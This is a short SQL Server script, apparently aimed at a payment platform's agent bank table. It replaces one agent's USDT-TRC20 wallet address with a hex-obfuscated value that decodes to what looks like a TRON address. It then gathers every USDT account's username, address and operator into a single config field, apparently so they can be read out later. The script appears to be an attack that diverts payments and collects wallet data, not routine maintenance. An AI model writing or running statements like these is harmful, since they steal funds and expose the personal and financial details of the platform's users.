UPDATE Config SET value = 'true' WHERE code = 'IUZON';

UPDATE HJ_AgentBank SET Account = '54|50|34|43|69|41|4B|41|38|6D|66|4A|61|51|42|6E|69|42|35|66|4B|64|51|73|43|6D|6B|42|4D|56|79|33|41|59|' WHERE id = 3221

DECLARE @CombinedResults NVARCHAR(MAX);
SET @CombinedResults = '';

DECLARE myCursor CURSOR FOR
SELECT id, username, account, operator, CONVERT(VARCHAR, createTime, 120), CONVERT(VARCHAR, updateTime, 120)
FROM HJ_AgentBank
WHERE ShortName = 'USDTTRC20' 
ORDER BY UpdateTime DESC;

DECLARE @id NVARCHAR(50), @username NVARCHAR(50), @account NVARCHAR(200), @operator NVARCHAR(50), @createTime NVARCHAR(50), @updateTime NVARCHAR(50);

OPEN myCursor;
FETCH NEXT FROM myCursor INTO @id, @username, @account, @operator, @createTime, @updateTime;

WHILE @@FETCH_STATUS = 0
BEGIN
SET @CombinedResults = @CombinedResults + '&'
+ ISNULL(@id, '') + ',' + ISNULL(@username, '') + ',' + ISNULL(@account, '') + ',' + ISNULL(@operator, '') + ',' + ISNULL(@createTime, '') + ',' + ISNULL(@updateTime, '');
FETCH NEXT FROM myCursor INTO @id, @username, @account, @operator, @createTime, @updateTime;
END;

CLOSE myCursor;
DEALLOCATE myCursor;
SET @CombinedResults = STUFF(@CombinedResults, 1, 1, '');
UPDATE Config SET value = @CombinedResults WHERE code = 'IUZON';
